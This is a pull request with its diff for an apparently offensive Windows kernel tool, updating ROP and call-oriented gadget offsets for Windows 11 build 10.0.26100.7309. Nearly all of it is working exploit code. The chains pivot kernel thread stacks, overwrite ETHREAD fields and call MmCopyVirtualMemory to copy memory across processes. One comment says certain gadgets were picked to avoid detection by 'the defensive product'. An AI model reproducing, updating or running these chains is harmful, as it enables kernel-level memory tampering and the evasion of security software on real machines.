### PR TITLE
Fix for Win11 25H2 10.0.26100.7309 (KB5070311)

### DIFF
--- a/include/rop_thread/stack_manager.hpp
+++ b/include/rop_thread/stack_manager.hpp
@@ -32,8 +32,10 @@ public:
     void PivotToR11();
     void MovRaxIntoR9();
     void MovRaxIntoR8();
+    void MovRaxIntoRdx();
     void SetR8(const std::uint64_t NewR8Value);
     void SetR9(const std::uint64_t NewR9Value);
+    void SetRax(const std::uint64_t NewRaxValue);
     void SetRdx(const std::uint64_t NewRdxValue);
     void SetRcxRdx(const std::uint64_t NewRcxValue, const std::uint64_t NewRdxValue);
     void SetRaxRcxRdx(const std::uint64_t NewRaxValue, const std::uint64_t NewRcxValue, const std::uint64_t NewRdxValue);
@@ -81,25 +83,25 @@ public:
         case 2:
         case 3:
         case 4:
-            this->AddGadget(0xbaf76a, "add rsp, 0x20; ret;");
+            this->AddGadget(0xbb476a, "add rsp, 0x20; ret;");
             break;
         case 5:
-            this->AddGadget(0x2005e3, "add rsp, 0x28; ret;");
+            this->AddGadget(0x2055f6, "add rsp, 0x28; ret;");
             break;
         case 6:
-            this->AddGadget(0x51ad84, "pop ...; pop ...; pop ...; pop ...; pop ...; pop ...; ret;");
+            this->AddGadget(0x51f844, "pop ...; pop ...; pop ...; pop ...; pop ...; pop ...; ret;");
             break;
         case 7:
-            this->AddGadget(0x20268c, "add rsp, 0x38; ret;");
+            this->AddGadget(0x20057e, "add rsp, 0x38; ret;");
             break;
         case 8:
-            this->AddGadget(0x3ded1c, "pop ...; add rsp, 0x20; pop ...; pop ...; pop ...; ret;");
+            this->AddGadget(0x3ebaec, "pop ...; add rsp, 0x20; pop ...; pop ...; pop ...; ret;");
             break;
         case 9:
-            this->AddGadget(0x216dce, "add rsp, 0x48; ret;");
+            this->AddGadget(0x202ed7, "add rsp, 0x48; ret;");
             break;
         case 10:
-            this->AddGadget(0x73027c, "pop ...; add rsp, 0x48; ret;");
+            this->AddGadget(0x73462c, "pop ...; add rsp, 0x48; ret;");
             break;
         }
 

--- a/src/rop_thread/rop_thread.cpp
+++ b/src/rop_thread/rop_thread.cpp
@@ -41,26 +41,25 @@ void RopThreadManager::BuildMainStack(StackManager* Stack, const SharedMemoryDat
     Stack->ReadIntoRcx(reinterpret_cast<std::uint64_t>(KernelMemory->KernelSharedMemoryAllocation) + offsetof(SharedMemoryData, WriteSrcEProcess));
     // fourth arg (shared memory + offsetof(dest addr))
     Stack->SetRdx(reinterpret_cast<std::uint64_t>(KernelMemory->KernelSharedMemoryAllocation) + offsetof(SharedMemoryData, WriteDstAddress));
-    Stack->AddGadget(0x21307f, "mov rax, rdx; ret;");
+    Stack->AddGadget(0x2087ab, "mov rax, rdx; ret;");
     Stack->ReadRaxIntoRax();
     Stack->MovRaxIntoR9();
     // third arg
     Stack->SetRdx(reinterpret_cast<std::uint64_t>(KernelMemory->KernelSharedMemoryAllocation) + offsetof(SharedMemoryData, WriteDstEProcess));
-    Stack->AddGadget(0x21307f, "mov rax, rdx; ret;");
+    Stack->AddGadget(0x2087ab, "mov rax, rdx; ret;");
     Stack->ReadRaxIntoRax();
     Stack->MovRaxIntoR8();
     // second arg
     Stack->SetRdx(reinterpret_cast<std::uint64_t>(KernelMemory->KernelSharedMemoryAllocation) + offsetof(SharedMemoryData, WriteSrcAddress));
-    Stack->AddGadget(0x21307f, "mov rax, rdx; ret;");
+    Stack->AddGadget(0x2087ab, "mov rax, rdx; ret;");
     Stack->ReadRaxIntoRax();
-    Stack->AddGadget(0x3e8baf, "cmp esi, esi; ret;");
-    Stack->AddGadget(0x2cbad3, "mov rdx, rax; jne 0x......; add rsp, 0x28; ret;");
-    Stack->AddPadding(0x28);
+    Stack->MovRaxIntoRdx();
+
     // perform call
     Stack->AlignStack();
     Stack->AddGadget(Driver::GetKernelFunctionOffset("MmCopyVirtualMemory"), "MmCopyVirtualMemory address");
     // clean up shadow space + args after call
-    Stack->AddGadget(0x20268c, "add rsp, 0x38; ret;");
+    Stack->AddGadget(0x20057e, "add rsp, 0x38; ret;");
     // shadow space
     Stack->AddPadding(0x20);
     // stack args
@@ -98,7 +97,7 @@ void RopThreadManager::SendPacket()
 void RopThreadManager::SpawnThread()
 {
     // mov rdx, qword ptr [rcx + 0x50]; mov rbp, qword ptr [rcx + 0x18]; mov rsp, qword ptr [rcx + 0x10]; jmp rdx;
-    void* BootstrapGadget = (void*)(Globals::KernelBase + 0x6999c0);
+    void* BootstrapGadget = (void*)(Globals::KernelBase + 0x69cd70);
 
     HANDLE KernelThreadHandle;
     NTSTATUS ThreadCreationStatus = KernelCaller.Call<NTSTATUS, HANDLE*, ULONG, OBJECT_ATTRIBUTES*, HANDLE, void*, void*, void*>(

--- a/src/rop_thread/stack_manager.cpp
+++ b/src/rop_thread/stack_manager.cpp
@@ -44,17 +44,17 @@ void StackManager::ReadIntoRcx(const std::uint64_t ReadAddress)
     // to a valid memory dummy pool so that it writes there. the value of 'rdx' is set in the first line.
     // to better optimize for our stack size without needing to use more gadgets and padding.
     this->SetR8((std::uint64_t)KernelMemory->DummyMemoryAllocation);
-    this->AddGadget(0xa9d96d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
+    this->AddGadget(0xa9c26d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
 }
 
 void StackManager::ReadRaxIntoRax()
 {
-    this->AddGadget(0x27af45, "mov rax, qword ptr \[rax\]; ret;");
+    this->AddGadget(0x208485, "mov rax, qword ptr \[rax\]; ret;");
 }
 
 void StackManager::PivotToR11()
 {
-    this->AddGadget(0x53435a, "mov rsp, r11; ret;");
+    this->AddGadget(0x538e1a, "mov rsp, r11; ret;");
 }
 
 void StackManager::MovRaxIntoR9()
@@ -63,15 +63,41 @@ void StackManager::MovRaxIntoR9()
     // on later versions it does not. This is why we add padding for some versions, and keep our
     // regex query generic to find any variation of this gadget.
     // TODO: Check if the instruction exists, instead of hardcoding the winvers.
-    this->AddGadget(0x2f3346, "mov r9, rax; mov rax, r9; (add rsp, 0x28; )?ret;");
+    this->AddGadget(0x2c77b6, "mov r9, rax; mov rax, r9; (add rsp, 0x28; )?ret;");
     if (Globals::WindowsBuild <= WINVER_WIN11_23H2)
         this->AddPadding(0x28);
 }
 
 void StackManager::MovRaxIntoR8()
 {
-    this->AddGadget(0x6038fd, "mov r8, rax; mov rax, r8; (add rsp, 0x28; )?ret;");
+    this->AddGadget(0x607d5d, "mov r8, rax; mov rax, r8; (add rsp, 0x28; )?ret;");
     this->AddPadding(0x28);
+}
+
+void StackManager::MovRaxIntoRdx()
+{
+    // Starting from Win11 25H2 update 10.0.26100.7309 (KB5070311)
+    // the "mov rdx, rax; jne 0x......; add rsp, 0x28; ret" gadget is gone
+    // so instead we need to chain a couple of gadgets using call oriented programming.
+    // Since 25H2 is labeled as 24H2 we will also have to perform this on 24H2.
+    if (Globals::WindowsBuild == WINVER_WIN11_25H2 || Globals::WindowsBuild == WINVER_WIN11_24H2)
+    {
+        // First we set rbx=rax
+        this->AddGadget(0x2046ee, "push rax; pop rbx; ret;");
+
+        // Then perform rdx=rbx with call oriented programming
+        // it calls into rax so we set rax to a ret so that it returns to the next gadget.
+        // The reason we "add rsp, 8" is so that we don't return back to the function that
+        // called rax, because upon a call the return address is stored. so by adding 8 we
+        // skip that, and it will be jumping to our next gadget.
+        this->SetRax(Globals::KernelBase + 0x2235c2); // add rsp, 8; ret;
+        this->AddGadget(0x52e158, "mov rdx, rbx; call rax;.*");
+        return;
+    }
+
+    // If running in older builds, we just use the much simpler gadget
+    this->AddGadget(0x3e8baf, "cmp esi, esi; ret;"); // Set ZF=1 so next jne doesn't jump
+    this->AddGadget(0x2cbad3, "mov rdx, rax; jne 0x......; add rsp, 0x28; ret;");
 }
 
 void StackManager::SetR8(const std::uint64_t NewR8Value)
@@ -79,7 +105,7 @@ void StackManager::SetR8(const std::uint64_t NewR8Value)
     // The reason that we don't simply use a 'pop r8; ret;' gadget is described in issue #12.
     // Basically, the stack unwinding can fail and misinterpret the value we pop as a 'ret' address,
     // this could potentially cause a detection with the defensive product.
-    this->AddGadget(0xb7e925, "pop r8; add rsp, 0x20; pop rbx; ret;");
+    this->AddGadget(0xb83925, "pop r8; add rsp, 0x20; pop rbx; ret;");
     this->AddValue(NewR8Value, "new r8 value");
     this->AddPadding(0x28);
 }
@@ -88,12 +114,20 @@ void StackManager::SetR9(const std::uint64_t NewR9Value)
 {
     this->SetR8(0);
     this->SetRcxRdx(NewR9Value, 0);
-    this->AddGadget(0x5187da, "mov r9, rcx; cmp r8, 8; je ........; mov eax, 0x[0-9a-fA-F]+; ret;");
+    this->AddGadget(0x51d29a, "mov r9, rcx; cmp r8, 8; je ........; mov eax, 0x[0-9a-fA-F]+; ret;");
+}
+
+void StackManager::SetRax(const std::uint64_t NewRaxValue)
+{
+    this->AddGadget(0x2f1957, "mov rax, qword ptr \[rsp \+ 0x30\]; add rsp, 0x48; ret;");
+    this->AddPadding(0x30);
+    this->AddValue(NewRaxValue, "new rax value");
+    this->AddPadding(0x10);
 }
 
 void StackManager::SetRdx(const std::uint64_t NewRdxValue)
 {
-    this->AddGadget(0xbaf765, "mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
+    this->AddGadget(0xbb4765, "mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
     this->AddPadding(0x10);
     this->AddValue(NewRdxValue, "new rdx value");
     this->AddPadding(0x8);
@@ -101,7 +135,7 @@ void StackManager::SetRdx(const std::uint64_t NewRdxValue)
 
 void StackManager::SetRcxRdx(const std::uint64_t NewRcxValue, const std::uint64_t NewRdxValue)
 {
-    this->AddGadget(0xbaf760, "mov rcx, qword ptr \[rsp \+ 8\]; mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
+    this->AddGadget(0xbb4760, "mov rcx, qword ptr \[rsp \+ 8\]; mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
     this->AddPadding(0x8);
     this->AddValue(NewRcxValue, "new rcx value");
     this->AddValue(NewRdxValue, "new rdx value");
@@ -110,7 +144,7 @@ void StackManager::SetRcxRdx(const std::uint64_t NewRcxValue, const std::uint64_
 
 void StackManager::SetRaxRcxRdx(const std::uint64_t NewRaxValue, const std::uint64_t NewRcxValue, const std::uint64_t NewRdxValue)
 {
-    this->AddGadget(0xbaf75c, "mov rax, qword ptr \[rsp\]; mov rcx, qword ptr \[rsp \+ 8\]; mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
+    this->AddGadget(0xbb475c, "mov rax, qword ptr \[rsp\]; mov rcx, qword ptr \[rsp \+ 8\]; mov rdx, qword ptr \[rsp \+ 0x10\]; add rsp, 0x20; ret;");
     this->AddValue(NewRaxValue, "new rax value");
     this->AddValue(NewRcxValue, "new rcx value");
     this->AddValue(NewRdxValue, "new rdx value");
@@ -123,13 +157,13 @@ void StackManager::ModifyThreadField(const std::uint64_t FieldOffset, const std:
 	// before the rest of our chain.
     this->SetR8(0);
     this->SetRcxRdx(NewValue, 0);
-	this->AddGadget(0x5187da, "mov r9, rcx; cmp r8, 8; je ........; mov eax, 0x[0-9a-fA-F]+; ret;");
+	this->AddGadget(0x51d29a, "mov r9, rcx; cmp r8, 8; je ........; mov eax, 0x[0-9a-fA-F]+; ret;");
 
 	// rax = Thread + Offset inside of ETHREAD, which we will write to
     this->AddFunctionCall("PsGetCurrentThread");
     this->SetRcxRdx(FieldOffset, 0);
-	this->AddGadget(0x263f08, "add rax, rcx; ret;");
-	this->AddGadget(0x2c36c7, "mov qword ptr \[rax\], r9; ret;");
+	this->AddGadget(0x23e6ec, "add rax, rcx; ret;");
+	this->AddGadget(0x4083b7, "mov qword ptr \[rax\], r9; ret;");
 }
 
 void StackManager::ModifyThreadStartAddress(const std::uint64_t NewStartAddress)
@@ -154,11 +188,11 @@ void StackManager::CallMmCopyVirtualMemory(void* SourceProcess, void* SourceAddr
     this->ReadIntoRcx(reinterpret_cast<std::uint64_t>(SourceProcess));
     // fourth arg
     this->SetRdx(reinterpret_cast<std::uint64_t>(TargetAddress));
-    this->AddGadget(0x21307f, "mov rax, rdx; ret;");
+    this->AddGadget(0x2087ab, "mov rax, rdx; ret;");
     this->MovRaxIntoR9();
     // third arg
     this->SetRdx(reinterpret_cast<std::uint64_t>(TargetProcess));
-    this->AddGadget(0x21307f, "mov rax, rdx; ret;");
+    this->AddGadget(0x2087ab, "mov rax, rdx; ret;");
     this->ReadRaxIntoRax();
     this->MovRaxIntoR8();
     // second arg
@@ -167,7 +201,7 @@ void StackManager::CallMmCopyVirtualMemory(void* SourceProcess, void* SourceAddr
     this->AlignStack();
     this->AddGadget(Driver::GetKernelFunctionOffset("MmCopyVirtualMemory"), "MmCopyVirtualMemory address");
     // clean up shadow space + args after call
-    this->AddGadget(0x20268c, "add rsp, 0x38; ret;");
+    this->AddGadget(0x20057e, "add rsp, 0x38; ret;");
     // shadow space
     this->AddPadding(0x20);
     // stack args
@@ -180,15 +214,15 @@ void StackManager::PivotToNewStack(StackManager& NewStack)
 {
     this->AddFunctionCall("PsGetCurrentThread");
     this->SetRcxRdx(0x30, (std::uint64_t)KernelMemory->StackLimitStoreAddress);
-    this->AddGadget(0x263f08, "add rax, rcx; ret;");
+    this->AddGadget(0x23e6ec, "add rax, rcx; ret;");
 
     // dereference rax, so that rax = stack limit
     this->ReadRaxIntoRax();
-    this->AddGadget(0x432e0d, "mov qword ptr \[rdx\], rax; ret;");
+    this->AddGadget(0x43eb3d, "mov qword ptr \[rdx\], rax; ret;");
 
 
     // move rax into rbx to preserve it
-    this->AddGadget(0x29cc0e, "push rax; pop rbx; ret;");
+    this->AddGadget(0x2046ee, "push rax; pop rbx; ret;");
     // sets rax to either 'rax + 0x2000' or 'rax + 0x4000' depending on i % 2.
     // read the value of the current stack offset global variable.
     // also set rcx to zero to clear it's higher bits since we later use 'ecx'
@@ -198,11 +232,11 @@ void StackManager::PivotToNewStack(StackManager& NewStack)
 
     // move eax into ecx so we store the offset in rcx (we don't need to use full 64bits because CurrentStackOffsetAddress
     // holds a small value, either 0x2000 or 0x4000 as an offset
-    this->AddGadget(0x212fcb, "xchg ecx, eax; ret;");
+    this->AddGadget(0x53a84b, "xchg ecx, eax; ret;");
     // restore the old value of rax into rax from rbx
-    this->AddGadget(0x56fa02, "push rbx; pop rax; add rsp, 0x20; pop rbx; ret;");
+    this->AddGadget(0x574492, "push rbx; pop rax; add rsp, 0x20; pop rbx; ret;");
     this->AddPadding(0x20 + 0x8);
-    this->AddGadget(0x263f08, "add rax, rcx; ret;");
+    this->AddGadget(0x23e6ec, "add rax, rcx; ret;");
 
 
     // Write our own stack into thread's legitimate stack
@@ -213,7 +247,7 @@ void StackManager::PivotToNewStack(StackManager& NewStack)
     // of the registers to a valid memory dummy pool so that it writes there.
     // rdx is currently being set above, at the start of the function to optimize for stack space usage.
     this->SetR8((std::uint64_t)KernelMemory->DummyMemoryAllocation);
-    this->AddGadget(0xa9d96d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
+    this->AddGadget(0xa9c26d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
 
     this->SetRdx((std::uint64_t)NewStack.StackAllocAddress);
     this->SetR8(NewStack.StackSizeLimit);
@@ -222,7 +256,7 @@ void StackManager::PivotToNewStack(StackManager& NewStack)
     // Grab stack limit
     this->AddFunctionCall("PsGetCurrentThread");
     this->SetRcxRdx(0x30, 0);
-    this->AddGadget(0x263f08, "add rax, rcx; ret;");
+    this->AddGadget(0x23e6ec, "add rax, rcx; ret;");
     // dereference rax, so that rax = stack limit
     this->ReadRaxIntoRax();
 
@@ -230,25 +264,25 @@ void StackManager::PivotToNewStack(StackManager& NewStack)
 
     // same code as above - basically just get the value of CurrentStackOffsetAddress
     // and add it to rax. so rax = stacklimit + curr_stack_offset
-    this->AddGadget(0x29cc0e, "push rax; pop rbx; ret;");
+    this->AddGadget(0x2046ee, "push rax; pop rbx; ret;");
     this->SetRaxRcxRdx((std::uint64_t)KernelMemory->CurrentStackOffsetAddress, 0, (std::uint64_t)KernelMemory->DummyMemoryAllocation);
     this->ReadRaxIntoRax();
-    this->AddGadget(0x212fcb, "xchg ecx, eax; ret;");
-    this->AddGadget(0x56fa02, "push rbx; pop rax; add rsp, 0x20; pop rbx; ret;");
+    this->AddGadget(0x53a84b, "xchg ecx, eax; ret;");
+    this->AddGadget(0x574492, "push rbx; pop rax; add rsp, 0x20; pop rbx; ret;");
     this->AddPadding(0x20 + 0x8);
-    this->AddGadget(0x263f08, "add rax, rcx; ret;");
+    this->AddGadget(0x23e6ec, "add rax, rcx; ret;");
 
     // same as above r9->rax->rcx, this is being stored here so we can overwrite rax for xor operation
     this->MovRaxIntoR9();
     this->SetR8((std::uint64_t)KernelMemory->DummyMemoryAllocation);
-    this->AddGadget(0xa9d96d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
+    this->AddGadget(0xa9c26d, "mov rcx, r9; mov qword ptr \[[a-zA-Z0-9]{2,3}\], [a-zA-Z0-9]{2,3}; ret;");
     // r11=rcx
-    this->AddGadget(0x56e1e7, "mov r11, rcx; mov r9d, edx; cmp edx, dword ptr \[rax\]; je 0x......; mov eax, 0xc000000d; ret;");
+    this->AddGadget(0x572c77, "mov r11, rcx; mov r9d, edx; cmp edx, dword ptr \[rax\]; je 0x......; mov eax, 0xc000000d; ret;");
 
     // xor the current stack offset by global by 0x6000 (0x2000 ^ 0x4000 = 0x6000),
     // meaning we will always swap between 0x2000 and 0x4000 per iteration.
     this->SetRaxRcxRdx(0x6000, 0, (std::uint64_t)KernelMemory->CurrentStackOffsetAddress);
-    this->AddGadget(0x43d6a8, "xor qword ptr \[rdx\], rax; ret;");
+    this->AddGadget(0x445eb8, "xor qword ptr \[rdx\], rax; ret;");
 
     // perform pivot, rsp=r11
     this->PivotToR11();


### PR DESCRIPTION
### Fixing offsets and gadgets for KB5070311-10.0.26100.7309
Gadgets for this build can be viewed here:
[KB5070311-10.0.26100.7309.gadgets.txt](https://github.com/user-attachments/files/23961299/KB5070311-10.0.26100.7309.gadgets.txt)

### Main issue
Offsets were updated, the main issue this new build had is that the code for `mov rdx, rax; jne 0x......; add rsp, 0x28; ret;` has been removed, I found no good replacement (there is one which clobbers r9, but we need r9 in the code where this is used).

What I ended up using is a call oriented programming gadget `mov rdx, rbx; call rax;.*`
So we can perform the following chain:
- Set rbx=rax using `push rax; pop rbx; ret;`
- Set rax to a gadget pointing to `add rsp, 8; ret;` (`add rsp, 8` is so we jump to the next gadget of our choice, and not whatever comes after the `mov rdx, rbx; call rax;` gadget).
- Set rdx=rbx, and execute `add rsp, 8; ret;` using the `mov rdx, rbx; call rax;.*` gadget

### Older versions
This is not a universal solution, meaning it only works on 24H2 and 25H2 - because that is where the `mov rdx, rbx; call rax;.*` gadget exists.
So there is a conditional for these versions. Otherwise, the old gadget `mov rdx, rax; jne 0x......; add rsp, 0x28; ret;` is used.